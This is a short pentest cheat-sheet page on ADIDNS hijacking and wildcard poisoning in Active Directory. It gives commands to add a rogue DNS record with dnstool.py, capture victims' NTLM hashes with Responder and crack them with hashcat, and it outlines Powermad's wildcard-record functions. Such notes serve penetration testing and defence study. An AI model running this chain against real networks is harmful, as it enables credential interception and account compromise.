search
githubEdit

ADIDNS Hijacking

hashtag
ADIDNS Hijacking

hashtag
Tools: dnstool.py, responder, Powermad, Invoke-DNSUpdate

hashtag
Requirements:

hashtag
A victim tries to connect to a domain that is NOT CONFIGURED, which means that we can make the domain point to OUR IP address instead.

python3 dnstool.py -u DOMAIN.LOCAL\\USER.NAME -p 'PASS' DOMAIN.LOCAL -r HIJACKED.DOMAIN.LOCAL -a add -d TARGET_IP -dns-ip OUR_IP

sudo responder -I tun0 (Capture NTLM Hash of victim)

hashcat -m 5600 -a 0 ntlmhash.txt /usr/share/wordlist/rockyou.txt (Crack hash)

hashtag
ADIDNS Poisoning

How to deal with the Active Directory Integrated DNS and redirect the NTLM authentications to us

  1. By default, any user can create new ADIDNS records

  2. But it is not possible to change or delete a record we do not own

  3. By default, the DNS will be used first for name resolution in the AD, and then NBT-NS, LLMNR, etc

If the wilcard record (*) doesn't exist, we can create it and all the authentications will arrive on our listener, except if the WPAD configuration specifically blocks it.

hashtag
Wildcard attack with Powermad

The char * can't be added via DNS protocol because it will break the request. Since we are in an AD we can modify the DNS via LDAP. This is what Powermad does:

get the value populated in the DNSRecord attribute of a node

creates a wildcard record, sets the DNSRecord and DNSTombstoned attributes

enable a tombstoned record

disable a node

remove a node

check the wildcard record works/resolve a name

hashtag
DNS update with Invoke-DNSUpdate

To work with "classic" record, i.e. not wildcard record

hashtag
dnstool python tool

Check if the '*' record exist

creates a wildcard record

disable a node

remove a node

PreviousDNSNextFeatures

Last updated